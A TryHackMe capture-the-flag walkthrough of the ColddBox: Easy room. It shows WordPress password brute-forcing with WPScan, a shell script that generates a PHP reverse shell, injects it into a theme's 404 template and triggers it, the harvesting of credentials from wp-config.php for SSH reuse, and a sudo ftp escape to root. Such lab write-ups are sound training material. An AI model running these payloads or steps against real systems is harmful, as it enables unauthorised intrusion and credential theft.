
ColddBox: Easy Room on TryHackMe: Complete Walkthrough and Guide


LINK - https://tryhackme.com/room/colddboxeasy


OVERVIEW

We are given an IP address. Let's scan it with Nmap.

ENUMERATION

The scan shows two open ports: 80 (HTTP) and 4512 (SSH, on a non-default port).
The site is running WordPress 4.1.31, so WPScan is the natural next tool.
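As an added example (not part of the original walkthrough): the Nmap command this step skips, plus a small parser for its grepable output so that a service on a non-default port, like SSH on 4512 here, is not overlooked. The target IP and output filename are assumptions, and the sample scan line is constructed rather than real output from the box.

```shell
#!/usr/bin/env bash
# Added example, not from the original walkthrough: full TCP sweep with
# version detection, then pull "port/service" pairs out of the -oG file.
set -eu

# Scan every TCP port, keep only open ones, save in grepable form.
# Target and output filename are assumptions.
scan() {
    local target="$1" out="${2:-scan.gnmap}"
    nmap -sV -p- --open -oG "$out" "$target" > /dev/null
    open_ports < "$out"
}

# Read a -oG file on stdin and print "port/service" for each open port.
# Grepable port entries look like 80/open/tcp//http//<version>/ and are
# comma-separated, so split on commas, then on slashes.
open_ports() {
    grep -E '^Host: .*Ports:' \
      | sed -E 's/.*Ports: //' \
      | tr ',' '\n' \
      | awk -F/ '$2 == "open" { gsub(/^[[:space:]]+/, "", $1); print $1 "/" $5 }'
}

# The check that matters on this box: where is SSH actually listening?
ssh_port() {
    open_ports | awk -F/ '$2 == "ssh" { print $1 }'
}

# Constructed sample in nmap's grepable format (not a real scan result).
sample_gnmap() {
    printf 'Host: 10.66.155.139 ()\tPorts: 80/open/tcp//http///, 4512/open/tcp//ssh///\tIgnored State: closed (65533)\n'
}

# Usage against a live target (assumed IP):
#   scan 10.66.155.139
# Offline, against the constructed sample:
#   sample_gnmap | open_ports      # 80/http and 4512/ssh
#   sample_gnmap | ssh_port        # 4512
```

The `ssh_port` helper is the point: a scan limited to the top 1000 ports would miss 4512 entirely, which is why the sweep uses `-p-`.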

Let's look at the website first.

There is a WordPress login page; let's try the default usernames and passwords.

That failed.

So let's enumerate directories with gobuster:

gobuster dir -u http://10.66.155.139/ -w /usr/share/wordlists/dirb/common.txt -x php,txt

There is a /hidden directory; let's check it out.

It reveals three usernames that we can use to brute-force the WordPress login. But first, let's run WPScan against the site in case a vulnerable plugin or theme turns up:

wpscan -v -e --url http://10.66.155.139/wp-login.php

That found nothing useful, so let's brute-force the passwords of our three users with WPScan (users.txt holds the names from /hidden, one per line):

wpscan -U users.txt -P /usr/share/wordlists/rockyou.txt --url http://10.66.155.139/

That recovers the password of the user c0ldd. Let's log in to the WordPress admin page with those credentials.

We are inside the WordPress dashboard. Let's check the Editor tab under Appearance to see whether we can edit theme code and get a reverse shell.

In the templates section there is a 404 Template (404.php), which we can overwrite with a reverse shell.

Grab the PentestMonkey PHP reverse shell from revshells.com, set your IP and port in it, and paste it in place of the template's contents.
Then start a netcat listener in your terminal on the same port:

nc -lvnp PORT

Click Update to save the modified 404.php.

Now request 404.php directly by its theme path so that PHP executes it and connects back to us:

http://10.66.155.139/wp-content/themes/twentyfifteen/404.php

Visiting that URL triggers the payload and your listener receives the shell. (When you are done, restore the original 404.php so the site is not left backdoored.)
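As an added example (not the page's own code, and not the PentestMonkey script): a shell helper that writes a minimal PHP reverse shell, the proc_open one-liner variant swapped in here for brevity, to paste into the 404 template, then starts the listener and requests the template. The LHOST, LPORT and target values are placeholders you supply; the theme name defaults to twentyfifteen as in the walkthrough's URL.

```shell
#!/usr/bin/env bash
# Added example, not from the original walkthrough. Generates the PHP payload
# for 404.php, then starts the listener and requests the template.
set -eu

# Minimal PHP reverse shell (proc_open variant) for LHOST:LPORT. Used here
# instead of the PentestMonkey script only to keep the example short; it
# needs proc_open() to be allowed in the target's PHP configuration.
make_php_revshell() {
    local lhost="$1" lport="$2"
    printf '<?php\n'
    printf '$sock = fsockopen("%s", %s);\n' "$lhost" "$lport"
    printf '$proc = proc_open("/bin/sh -i", array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);\n'
}

# URL of the theme's 404 template. WordPress serves theme files directly,
# so requesting this path runs whatever was saved in the editor.
template_url() {
    local target="$1" theme="${2:-twentyfifteen}"
    printf 'http://%s/wp-content/themes/%s/404.php\n' "$target" "$theme"
}

# Start nc, and from a background subshell request the template so the
# payload fires. Run this only after pasting the payload and clicking Update.
catch_shell() {
    local target="$1" lport="$2"
    # -m 5: the HTTP request can hang while the shell is alive, so cap it.
    (sleep 2; curl -s -m 5 -o /dev/null "$(template_url "$target")" || true) &
    nc -lvnp "$lport"
}

# Usage (assumed values; 10.8.0.5 stands for your VPN address):
#   make_php_revshell 10.8.0.5 4444 > 404.php   # paste 404.php into the editor
#   catch_shell 10.66.155.139 4444              # then trigger and catch
```

Keep the generated 404.php: after the engagement, paste the theme's original template back so you are not leaving a webshell behind.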

We can't read user.txt yet, because this shell runs as the web server user rather than c0ldd.
But we can read wp-config.php in the web root, /var/www/html, and that file usually contains credentials.

We were right: it holds the MySQL database credentials for the user c0ldd.
I enumerated the MySQL database but found nothing useful beyond the password hashes of the three WordPress users we found earlier. Those are WordPress logins we already have access to, so I didn't spend time cracking them.
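As an added example (not from the original walkthrough): a parser that pulls the database credentials and table prefix out of wp-config.php, and prints the two reuse checks worth running next, the database query and the SSH login on the non-default port. The wp-config.php content below is a constructed sample, not the real file from the box, and its password is made up.

```shell
#!/usr/bin/env bash
# Added example, not from the original walkthrough: read the constants that
# matter out of wp-config.php and print the follow-up checks.
set -eu

# Return the value of define('KEY', 'value') for KEY. Handles either quote
# style and optional whitespace inside the parentheses; first match wins.
wp_config_get() {
    local file="$1" key="$2"
    grep -E "^[[:space:]]*define[[:space:]]*\([[:space:]]*['\"]${key}['\"]" "$file" \
      | sed -E "s/.*['\"]${key}['\"][[:space:]]*,[[:space:]]*['\"]([^'\"]*)['\"].*/\1/" \
      | head -n 1
}

# The table prefix decides the name of the users table (wp_users by default).
wp_table_prefix() {
    grep -E '^\$table_prefix' "$1" \
      | sed -E "s/.*=[[:space:]]*['\"]([^'\"]*)['\"].*/\1/" \
      | head -n 1
}

# Print the reuse checks. The password is deliberately not placed on the
# command line: mysql -p with no value prompts for it, keeping it out of
# the process list and shell history.
reuse_checks() {
    local file="$1" host="$2" ssh_port="$3"
    local user db prefix
    user=$(wp_config_get "$file" DB_USER)
    db=$(wp_config_get "$file" DB_NAME)
    prefix=$(wp_table_prefix "$file")
    printf "mysql -u '%s' -p '%s' -e 'SELECT user_login, user_pass FROM %susers'\n" "$user" "$db" "$prefix"
    printf 'ssh -p %s %s@%s\n' "$ssh_port" "$user" "$host"
}

# Constructed sample wp-config.php (not the real file from the box).
sample_wp_config() {
    cat > "$1" <<'EOF'
<?php
// constructed sample for the example
define( 'DB_NAME', 'colddbox' );
define('DB_USER', 'c0ldd');
define("DB_PASSWORD", "Example-Pa55");
define('DB_HOST', 'localhost');
$table_prefix = 'wp_';
EOF
}

# Usage on the real box (paths and IP assumed):
#   reuse_checks /var/www/html/wp-config.php 10.66.155.139 4512
```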


USER FLAG

Then I remembered that the database password might be reused elsewhere, and SSH on port 4512 came to mind. Let's try those credentials to log in as c0ldd:

ssh c0ldd@10.66.155.139 -p 4512

It works. You can now grab user.txt from /home/c0ldd.


PRIVILEGE ESCALATION / ROOT FLAG

Now let's escalate privileges. As usual, start with sudo -l.

It lists three binaries that c0ldd may run with sudo. Either vim or ftp can be used to escalate; I'll use ftp here. At the ftp> prompt, ! runs a command in a shell, and that shell inherits root from sudo:

sudo ftp
!/bin/bash

That drops you into a root shell (confirm with id), and you can read the root flag from /root.

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!